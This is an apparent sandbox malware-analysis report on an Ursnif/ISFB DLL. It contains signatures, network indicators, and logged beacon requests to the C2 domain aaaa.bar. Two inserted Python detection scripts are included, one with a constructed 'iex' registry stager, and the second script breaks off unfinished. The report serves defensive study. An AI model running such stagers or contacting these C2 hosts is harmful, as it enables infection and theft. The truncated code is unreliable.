Windows Analysis Report gECym.bin

Overview

General Information

Sample Name: gECym.bin (renamed file extension from bin to dll)
Analysis ID: 506330
MD5: fcb53acd5fd1637a2ac1bc69f396e92c
SHA1: a09432a56375c5a39856d59e402c3f8642edda7b
SHA256: cc7045d9fe77c4aa4cb646d01fb4700008a34f58f49358d0b0b0997d21016aab
Tags: 7412, exe, greenpass, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Encoded IEX
Hooks registry keys query functions (used to hide registry keys)
Writes or reads registry keys via WMI
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Tries to load missing DLLs
Contains functionality to read the PEB
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
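The Sigma hits above (Powershell run code from registry, Encoded IEX, MSHTA Spawning Windows Shell) and the very-long-command-line heuristic describe a loader chain that can be checked for directly in process-creation telemetry. The following is an added example, not part of the sandbox report and not the Sigma rules' own text: it re-implements those four checks in Python over records shaped like Sysmon Event ID 1. The events, the HKCU path and the 1024-character argument threshold are constructed for illustration; the report does not show the sample's actual command lines.

```python
"""Process-creation triage for the loader chain behind this report's Sigma hits:
MSHTA spawning a Windows shell, an encoded IEX, PowerShell running code pulled
from the registry, plus the 'very long command line option' heuristic.

Added example; not sandbox output and not the Sigma rules' own text. Events are
constructed in the shape of Sysmon Event ID 1 records (the report does not show
the sample's real command lines); the registry path is a placeholder and the
1024-character argument threshold is this example's choice.
"""
import base64
import re
from typing import Optional

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
          "reg.exe", "regsvr32.exe", "rundll32.exe", "bitsadmin.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
ENC_FLAG_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
IEX_RE = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
REGISTRY_RE = re.compile(r"(?i)get-itemproperty(?:value)?|\[microsoft\.win32\.registry\]"
                         r"|\bhk(?:cu|lm|u):|hkey_(?:current_user|local_machine|users)")
LONG_ARG_THRESHOLD = 1024  # assumption: the report does not state its cut-off


def image_name(path: str) -> str:
    """Lower-cased file name of a process image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Plaintext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE),
    or None when the command line carries none or it does not decode."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event: dict) -> dict:
    """Return the rule names an event triggers, plus the decoded script if any."""
    image, parent = image_name(event["Image"]), image_name(event["ParentImage"])
    cmd = event["CommandLine"]
    hits = []

    if parent == "mshta.exe" and image in SHELLS:
        hits.append("MSHTA spawning Windows shell")

    decoded = decode_encoded_command(cmd) if image in POWERSHELL else None
    if decoded and IEX_RE.search(decoded):
        hits.append("Encoded IEX")

    # Registry-resident stage: script text that reads a registry value and feeds
    # the result to Invoke-Expression, whether in clear or behind -enc.
    script = decoded if decoded is not None else cmd
    if image in POWERSHELL and REGISTRY_RE.search(script) and IEX_RE.search(script):
        hits.append("PowerShell run code from registry")

    if max((len(tok) for tok in cmd.split()), default=0) > LONG_ARG_THRESHOLD:
        hits.append("Very long command line option")

    return {"image": image, "parent": parent, "hits": hits, "decoded": decoded}


def encode_command(script: str) -> str:
    """Build the base64(UTF-16LE) form PowerShell accepts after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed events; the HKCU path is a placeholder, not the sample's.
STAGER = r"iex ((Get-ItemProperty 'HKCU:\Software\Example\Loader').Blob)"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(STAGER)},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'powershell.exe -NoProfile -Command "Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion | Select-Object ProductName"'},
    {"ParentImage": r"C:\Windows\System32\mshta.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo probe"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = evaluate(ev)
        print(f"{r['parent']} -> {r['image']}: {r['hits'] or 'no hits'}")
```

The second constructed event reads the registry from PowerShell but never hands the value to Invoke-Expression, so it produces no hit; the rule fires on the combination, not on Get-ItemProperty alone, which keeps administrative scripts out of the alert queue.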

Classification

AV Detection:

Multi AV Scanner detection for submitted file
Source: gECym.dll Virustotal: Detection: 10%
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.loaddll32.exe.10000000.3.unpack Avira: Label: TR/Crypt.XPACK.Gen8
Note: the 10% VirusTotal rate applies to the packed DLL at submission time, and the Avira label on the unpacked module is a generic packer heuristic; the Ursnif verdict rests on the Yara matches against unpacked memory and on the behavioural signatures below, not on AV coverage.

Compliance:

Uses 32bit PE files
Source: gECym.dll Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Note: RELOCS_STRIPPED on a DLL means the loader cannot rebase it and must map it at its preferred image base; 0x10000000 is the linker default for 32-bit DLLs, and a module is indeed present at that address in loaddll32.exe (dumped as 0.2.loaddll32.exe.10000000.3.unpack).
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49785 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.7.139:443 -> 192.168.2.5:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49825 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.3.70:443 -> 192.168.2.5:49826 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.217.168.38:443 -> 192.168.2.5:49824 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49836 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49835 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49834 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49952 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49954 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49963 version: TLS 1.2
Source: unknown HTTPS traffic detected: 31.220.111.98:443 -> 192.168.2.5:49969 version: TLS 1.2

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: aaaa.bar
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 31.220.111.98 187
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49965 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: loaddll32.exe, 00000000.00000003.725335981.000000000124A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.769019185.0000000003322000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp, regsvr32.exe, 00000003.00000003.750727112.0000000003333000.00000004.00000001.sdmp String found in binary or memory: https://aaaa.bar/
Source: loaddll32.exe, 00000000.00000002.798277026.0000000001160000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.800825641.000000000122E000.00000004.00000020.sdmp String found in binary or memory: https://aaaa.bar/jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2
Source: loaddll32.exe, 00000000.00000002.800982427.000000000123F000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000002.798415172.000000000116B000.00000004.00000020.sdmp String found in binary or memory: https://aaaa.bar/jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF
Source: loaddll32.exe, 00000000.00000002.800125274.00000000011E8000.00000004.00000020.sdmp String found in binary or memory: https://aaaa.bar/jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovu
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: global traffic HTTP traffic detected: GET /cookieconsentpub/v1/geo/location HTTP/1.1 | Accept: application/javascript, */*;q=0.8 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: geolocation.onetrust.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /tag?o=6208086025961472&upapi=true HTTP/1.1 | Accept: application/javascript, */*;q=0.8 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: btloader.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /px.gif?ch=1&e=0.9973131461099627 HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: ad-delivery.net | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico?ad=300x250&ad_box_=1&adnet=1&showad=1&size=250x250 HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: ad.doubleclick.net | Connection: Keep-Alive | Cookie: IDE=AHWqTUkh5fOLAUMX20ZV8xqf__2tu45ymTec8GQqE60qWk9cSV6VA3zk_7PBuUk4
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5b179a030c29a1ac065fdc22323514dd.png HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F18faa6af75b04f0199f63404d815074b.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FIBK%2F542734683__clsfZCtG.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F0d7ca0c89d5d09bf1d71170b01c3a769.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F5282696e9e2aabcd3d346a6d7ed7591e.png HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2Cb_auto/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Faedbb0638c2ccabdeb958fc2d93204dc.jpg HTTP/1.1 | Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5 | Referer: https://www.msn.com/de-ch/?ocid=iehp | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: img.img-taboola.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jdraw/v6MBuMp_2/FbQ1ciPPyCG2FcgWXCEw/4p6JWEqOHqaqqmtUZlW/iZ4hp74waYQa3SoGGuOho1/ovuxQrp7KsWgS/wBggvPBS/iWInt5CFnJyvSqpyHgJyYxn/O_2F_2BUYe/fLDTk5RpDf_2F9mZ_/2F7NAIxeGgZa/QcsaY21TZZx/U7QIv9qlBRWqpg/DR61HU_2FzqgxKP2wonEs/EkSZK.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/5EykzOMH8AC5xhH2f/h8YTRIF2mRSj/KI86vZ_2Fir/d_2FuekCCAOUjf/zFWcX3e13Ac_2BX_2BJGA/HUhc5yQiyPXedVM9/FyaB9AafT7f6pn1/rx17UyN0GmK2igoXTb/2p_2Bsvx3/fo8we1bgw6ZsfyAC6K72/DEX9YIVMXwvcSkZsNZR/8w9U8utAyGo407eExfiyfi/bLDkUZuz9hmdJ/XGInYyFxli4cy/JoKC.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /jdraw/34E0B5g64GhF/3XPDxs0lbMy/bqW9ARMnbt0tkT/D8MYNhHmIu3qZwQWjO72P/RY9TfewXOKIHe_2B/ce4ORl02hRz9Esp/_2BVvpIh9LurZ83S_2/B0O2_2FdR/gIrNQT1mMUiZ_2BS_2BT/MDTnU5RczKhEBmBWqGJ/EyrDp1_2FuqKMBIze3vzAt/t9EP4e8z_2FDf/kKFLZbmvwAVEbK/QjYP.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/MVdZIiu0NzX64W/jGgxHg6bC6YiiTOGCL_2B/K5_2B4OguOIrq_2F/deq5LFM1_2Fh_2B/A30hkj4LBKS8PnjdwI/9w5zD21KD/Gv4zCmpHpXW8kBPJ6yzJ/GKf4n1QcwBRAhkvF2a_/2BDpnBrAV7AZvGg_2FwtGG/RaDUbMye7jqhn/NmN4Vf9F/bD7myyGQXfiKlv1_2BoXKI7/VLTDzeWG/dZ.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
Source: global traffic HTTP traffic detected: GET /jdraw/VsEIWZ_2Fbo/VS2aUL2DPkksBz/_2BbHmaiMGFq8k7sf_2FK/_2BE4M1ccGRR2cER/_2ByL6dRggF3y7v/VMJcRRP5R6TojvxFTX/kOSl73q2F/w8Q6acp8KbUFCwTOVCqa/KHPQFw1IxW8ntmCw6R5/_2FriFMvRAS7jKjzJNgjI_/2B3Jlm1ZTjVZL/7f9n_2Fm/j0A3VF_2BTXTJlyVXccf7gs/IMfn4fjHWd/I3IboiX_2F3/uQt3.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: PHPSESSID=al703vnk3gvkbspp3p283jhcg4; lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/yQNRXOou_2F/TKb_2FDPLUxEHX/34UsINmRGrF0U0brjExsG/R8lvAy6e3bs7Nh2H/QoLe_2Bwp2v2e8Z/IwuiqSnSaPWQnudhme/0fUiRiwnK/HC2m5rShJXeZnaMhBAa7/2sv1pUExc23tcG4uzbe/S9YqUCaVHHJSHD_2FHBasu/DOlWi2P1fW4xM/vPgP1tY3/PB1yvdHjP2kNFl0vG_2Fhxc/khv1QiPG/3tnR7uH.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/NO7gR0KTty/Oqx9aKgxsT2Y54eU9/T_2Fq68MoL8B/sVtG7ExwGuN/2b4WQXmrNjZqxz/IsPGuUpM_2FQweZHv_2BB/qSCYCr2zsOkbh38r/It4yIHc8jFLoOJQ/k2WdhsET8UEtCwKWoz/qKONYcQpl/QBJ1lUtsdnk2R51rdvsn/Du_2F_2Ftub4vOTuIOX/47sdvY8Q/mQd32Pz7EA_2F/N.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=lsnqfh754hfkcfkt83tqpqmdf3
Source: global traffic HTTP traffic detected: GET /jdraw/6ybu_2FNdKF0gG/m7orpeXdQJjdHGv7mDMIL/JfKVVeTDKq1gaDX7/GcXqJLlu546KZ6e/n4P4OzwLSG43PTmkn1/t0lauqlYi/uThwI2_2Bb89U_2F9plY/Zxq7QGyY_2FF4AUNHAt/i342YI4jYPKMWYQUn0qvUq/ia1VXOlbfvfYW/_2BuG_2B/Dlgb1sPi5LA4l6opVIFmhDT/0Z5HvD.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
Source: global traffic HTTP traffic detected: GET /jdraw/hqka30Wii/31Oq5rEnSRjUxODbgauN/3Qomlb_2B6I7h2xlFjq/YffmBTpCRrKlCahwBmdROz/L3L_2BpluTz9H/ch5yKjwO/n0FR27CV_2B_2FzpXk9iMJC/P_2Fk2e7Yv/b_2BW31QojrkMDFWC/tZHFJBu8lQql/OZI9lNxt6O0/sFuOUiC9FGcBD8/qZGUVX5D_2FYXiueA015K/GMEnEsw.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=h4s0ka612qu3hrcshs8hb4ig95
Source: global traffic HTTP traffic detected: GET /jdraw/H4GjPkmE7AedOn2/SaetnicpaebgBYZBph/BvmQBH2Ya/Oa7o5fA_2FxihzNsKVGG/_2BKOERN0ze3StZ8PJO/K9jrlAYK2cirYDQTLgJFGo/m_2BMIG_2Ff7J/M2tNW_2B/JwKxyFyNvYCJPpLYcu2z3fg/Co6_2F9DSd/aeV2iIileaWP_2B3q/B8Ii95Syxk_2/BFqOHwCSf6U/KnFKNxJjQfI9vK/6tnrhCZ8FpH5l_2FDWF/lT.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en
Source: global traffic HTTP traffic detected: GET /jdraw/WNAlg8cEc/UcfXfHTDCraOPvAxQ0u0/IBGE8nVsnVmaTWmqt_2/FgXrkKfYI9UDVTSC9YOK9U/edsq3qaEaK4UV/nX98HXXg/zJ1jx_2BUw5Fkli5F8AIb_2/FG3fGkSRfJ/J4BestfVNDAUFKDxV/xH_2BYMBJKGO/i9O5kI15Exg/Ujf1s7nWsRKDBP/pBWe2EoKcTyJW0r5TV22O/pk_2FzstpMvpdzlO/Mq8HfsXB/P.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
Source: global traffic HTTP traffic detected: GET /jdraw/gquCtxgLcwr_2F/e84ivzpkcm6RjGEX01HRQ/1JrxRgAMZnr84pf7/d6zLleHTDCpRxyP/mtUcNkhWJ9YEaOQAKu/ZbEc2Du6X/JsZUowsYOu98vblofvm0/EeOsadhZCmRp8ZCZ8KO/Ei99ya5BDB6uxeZYaXwGYu/W7LMC3IC7p7Aq/X8nzxfM9/9M7hUrRFHoU/Zf8MWsTW.crw HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: aaaa.bar | Connection: Keep-Alive | Cache-Control: no-cache | Cookie: lang=en; PHPSESSID=odtoci95m4hvgdsrbq2j2bach6
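The GET requests to aaaa.bar above follow the Ursnif/ISFB URI scheme: the request data is base64-encoded, the base64 characters '/' and '+' are rewritten as _2F and _2B, the string is chopped into path segments under a fixed leading directory (jdraw here) and given a fake extension (.crw). The msn.com, Taboola and DoubleClick requests, by contrast, carry Internet Explorer 11's Trident/7.0 User-Agent and the msn.com home-page Referer. The following added example (not from the report and not Ursnif tooling) re-assembles the base64 from a path, checks that it decodes to a 16-byte block multiple, and scores requests on that plus the _2F/_2B tokens, path depth and the hard-coded "MSIE 8.0; Windows NT 10.0" User-Agent (Internet Explorer 8 never shipped on Windows 10). The sample requests are transcribed from the HTTP lines above; the scoring thresholds are the example's own. The decoded bytes are ciphertext and the report gives no key, so decoding stops at the base64 layer.

```python
"""Triage HTTP requests for Ursnif/ISFB-style C2 URIs.

Added example for this report, not sandbox output or Ursnif tooling. The
sample requests are transcribed from the report's 'HTTP traffic detected'
lines; the decoding steps follow the documented Ursnif URI scheme and the
scoring thresholds are this example's own.
"""
import base64
import re
from typing import List, Optional

# Ursnif escapes the base64 characters '/' and '+' as _2F and _2B, then cuts the
# string into a deep path under a fixed directory and appends a fake extension.
ESCAPE_RE = re.compile(r"_2[FB]")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+$")
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_]+$")
EXT_RE = re.compile(r"\.[A-Za-z0-9]{1,4}$")
# Hard-coded by the sample; IE 8 never shipped on Windows 10, so the pair is a tell.
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)"
IE11_UA = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"


def path_segments(path: str) -> List[str]:
    """Non-empty path components with any query string removed."""
    return [s for s in path.split("?", 1)[0].split("/") if s]


def reassemble(path: str) -> Optional[str]:
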